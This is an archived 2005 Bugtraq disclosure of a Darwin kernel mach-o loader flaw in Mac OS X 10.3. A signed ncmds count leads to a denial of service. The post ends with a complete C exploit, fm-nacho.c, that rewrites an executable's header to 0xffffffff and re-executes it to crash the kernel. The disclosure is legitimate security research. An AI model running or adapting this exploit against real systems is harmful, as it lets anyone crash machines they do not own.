lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20050119195315.GB2895@felinemenace.org>
Date: Wed, 19 Jan 2005 11:53:15 -0800
From: nemo@...inemenace.org
To: bugtraq@...urityfocus.com
Subject: Darwin Kernel Vulnerability


"moderator: resending this mail since it appears to of got dropped, if not, please ignore this message.

                     _,'|             _.-''``-...___..--';)
                     /_ \'.      __..-' ,      ,--...--'''
                    <\    .`--'''       `     /'
                    `-';'               ;   ; ;
               __...--''     ___...--_..'  .;.'
           fL (,__....----'''       (,..--''  felinemenace.org

Program:	Darwin Kernel 7.1
Impact:		DoS, Possible local privilege escalation.	
Discovered:	8th January 2005 by nemo -( nemo @ felinemenace.org )-
Writeup and exploits:

1) Background

Numerous bugs exist in the Darwin Kernel used by Mac OSX 10.3
Some of the bugs we investigated exist due to lack of input validation in the mach-o 
loader.

2) Description

In the file bsd/kern/mach_loader.c the mach-o header is parsed and for the most part
each field is trusted to be acceptable.

In the mach-o loader code (parse_machfile()) ncmds and offset are both declared as 
signed integers, however the appropriate structs used to read from the file are 
unsigned.
After a little investigation a DoS was quickly written to set ncmds to -1. 

	ncmds = header->ncmds; 
			while (ncmds--) {

The attached code will cause a denial of service on MacOSX <= 10.3.7

3) Notes
During our audit of the Darwin Kernel many bugs stood out, however we have not 
had time to follow through on most of them. Something that caught our attention 
was the misuse of the copyinstr() command. This function will not force a NULL
character to be appended to the string copied in, however it seems in many cases
the size passed to the function doesn't take this into account.
Unfortunately, as security goes, its all about who posts first. 
http://www.immunitysec.com/downloads/nukido.pdf

4) Vendor status/notes/fixes/statements
Apple have been notified about this bug.

5) Exploit

//---------------------( fm-nacho.c )--------------------------
/*
 * DoS for Darwin Kernel Version < 7.5.0
 * -(nemo@...ltheplug.org)-
 * 2005
 *
 * greetz to awnex, cryp, nt, andrewg, arc, mercy, amnesia ;)
 * irc.pulltheplug.org (#social)
 */

#include <stdio.h>

int main(int ac, char **av)
{
        FILE *me;
        int rpl = 0xffffffff;
        fpos_t pos = 0x10;
        printf("-( nacho - 2004 DoS for OSX (darwin < 7.5.0 )-\n");
        printf("-( nemo@...ltheplug.org )-\n\n");
        printf("[+] Opening file for writing.\n");
        if(!(me = fopen(*av,"r+"))) {
                printf("[-] Error opening exe.\n");
                exit(1);
        }
        printf("[+] Seeking to ncmds.\n");
        if((fsetpos(me,&pos)) == -1) {
                printf("[-] Error seeking to ncmds.\n");
                exit(1);
        }
        printf("[+] Changing ncmds to 0x%x.\n",rpl);
        if(fwrite(&rpl,4,1,me) < 1) {
                printf("[-] Error writing to file.\n");
                exit(1);
        }
        fclose(me);
        printf("[+] Re-executing with modified mach-o header.\n");
        sleep(5);
        if(execv(*av,av) == -1 ) {
                printf("[-] Error executing %s, please run manually.\n",*av);
                exit(1);
        }
        exit(0); // hrm
}




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ